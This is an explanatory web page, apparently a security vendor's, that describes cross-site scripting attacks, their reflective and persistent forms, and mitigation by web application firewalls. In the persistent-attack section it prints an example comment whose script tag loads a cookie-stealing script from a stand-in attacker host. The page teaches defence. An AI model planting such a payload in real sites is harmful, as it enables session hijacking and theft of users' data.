Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is used by attackers to inject malicious code into vulnerable web applications. Unlike other web application attacks (such as SQL injection) attackers are not directly targeting the application. Instead, the application is a means for attacking the application user.
Although there are myriad reasons for an XSS attack, the more common ones are:

  • Hijacking the user’s account
  • Accessing the user’s browser history or private messages
  • Exploiting the user’s web applications and devices, such as webcams, microphones, files, geolocation info, etc.
  • Distributing web worms via the user’s browser

Often an XSS attack is the first step in an escalating series of more serious attacks. When combined with social engineering, an XSS attack can result in identity theft, keylogging, cookie theft, or phishing attacks.

Threat Description

An XSS attack embeds a malicious script into a vulnerable webpage, which is then executed by the user’s browser. A webpage is vulnerable if:

  • User-supplied input is automatically added to HTML output; and
  • Output to the browser does not use sensitive-escaping to prevent running user-supplied scripts

There are two primary types of XSS attacks: reflective and persistent.

Reflective (Unstored) XSS Attacks

A reflective XSS attack mimic a trusted person or organization so that a user clicks a link to a malicious script.

One of the most common reflective XSS attack methods is to send an email, text message, or social media message containing a link to malicious JavaScript. If the recipient clicks the link — and the web application does not validate the JavaScript input or encode the HTML output — the malicious code is reflected directly back to the user’s browser, where it’s executed during the user’s current session.

Persistent (Stored) XXS Attacks

A persistent XSS attack embeds malicious HTML tags — for example, script, body, img, iframe, input, link, object, table — directly into a vulnerable web application’s page. Blogs, social networks, video sharing platforms, and message boards are primary targets for persistent XSS attacks.

Unlike a reflective XSS attack, which activates an attack script only after a user clicks a malicious link, a persistent XSS attack only requires a visit to the compromised web page. This increases the reach of the attack, endangering all visitors regardless of their level of vigilance.

For example, an attacker discovers that an online news site allows HTML tags to be embedded in a page’s comment section. The attacker submits a comment that includes HTML tags, such as:

Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>

The HTML tags are now a part of the comments section of the page. As a result, every time the page is accessed, the HTML tag activates the JavaScript file hosted on the attacksite.com site. The activated script can then steal every visitor’s cookies for that session.

With the session cookies in hand, the attacker can hijack any visitor’s account, accessing personal and confidential information without the knowledge or consent of the visitor.

Figure 1. Persistent XSS Attack

Mitigation Methods

A web application firewall (WAF) is the most commonly used solution for protecting against XSS and other web application attacks. In the case of XSS attacks, most WAFs use signature-based filtering to identify and block malicious requests.

Learn how Imperva solutions can help you mitigate XSS attacks.

You might be interested in:

DDoS Prevention

Distributed Denial of Service (DDoS) attacks are designed to overwhelm network resources and render them unavailable to legitimate…

Learn More

Web Application Firewall (WAF)

Web Application Firewalls (WAFs) are hardware, software, virtual, and cloud-based firewall solutions. Unlike other network infrastructure security solutions,…

Learn More